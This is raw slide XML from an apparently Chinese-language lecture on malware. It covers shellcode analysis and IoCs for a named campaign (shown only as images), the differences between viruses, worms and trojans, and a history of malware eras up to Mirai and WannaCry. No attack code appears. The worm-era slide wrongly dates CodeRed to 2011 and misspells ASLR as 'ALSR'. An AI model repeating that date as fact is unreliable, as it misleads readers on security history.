            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876254" y="1206708"/>
            <a:ext cx="8342403" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>ShellCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA966888-5A74-4092-8A86-38C81BCBAEA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021673" y="1752131"/>
            <a:ext cx="6800850" cy="4552950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101361062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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876254" y="1206708"/>
            <a:ext cx="8342403" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>IoCs</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532E9181-050D-4787-8761-F17FD34166F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331534" y="1759158"/>
            <a:ext cx="6772275" cy="4705350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6DBF51F-CB6B-40E3-B162-8E84CC80EE72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472503" y="1759158"/>
            <a:ext cx="6819900" cy="3562350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85C0B0B8-838F-4DB8-A79B-CA8A1BA70284}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011024" y="3429000"/>
            <a:ext cx="6800850" cy="2219325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1654166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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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41AC77-7098-48C2-9A71-6394F447FDA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>病毒、蠕虫、木马的区别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DE6846C-B26A-4EBF-929E-F835290C636B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB872884-96CD-431E-8999-83D26B129A2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530186" y="2322916"/>
            <a:ext cx="8029654" cy="2638827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796540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334126" y="2895600"/>
            <a:ext cx="6600200" cy="958850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>二、恶意代码概念的演变</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34650741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79985" y="1459570"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年以前：病毒时代</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>背景：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>退场，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows 9x / NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>广泛应用，促进了网络应用进入日常生活中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时代，感染式病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）、蠕虫（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）和特洛伊木马（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），都是相对窄而互斥的技术概念：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是主流</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码概念的发展史</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23207273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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2000~2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：蠕虫大爆发时代</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Happy99</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>蠕虫利用劫持电子邮件的方式传播并快速流行，拉开了蠕虫时代大幕</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年：红色代码（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CodeRed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）及其变种“红色代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>II”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CodeRed II</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）大爆发：扫描溢出型蠕虫的典型代表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码概念的发展史</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21431186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69625" y="1333445"/>
            <a:ext cx="8201407" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2005~2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：木马泛滥时代</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>随着端系统的安全性的提高（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ALSR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等技术的应用），蠕虫的影响开始减弱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年，以灰鸽子、冰河为代表的远程控制程序在技术上趋于成熟，感染数量持续增加</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2007~2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：地下经济运作日趋“成熟”，基于木马的黑色产业链</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年上半年：毒王“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>AV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>终结者”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码概念的发展史</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945" y="1887099"/>
            <a:ext cx="7664768" cy="4172903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1080893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43048" y="1443803"/>
            <a:ext cx="7772400" cy="4216017"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2010~2020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：虚拟货币和隐秘网络带动的勒索新对抗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2013</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年开始，勒索软件、挖矿木马逐步泛滥</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>爆发，致瘫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Dyn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>全球大爆发</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2019</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WannaMine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>挖矿木马爆发</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码概念的发展史</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39747756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41AC77-7098-48C2-9A71-6394F447FDA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
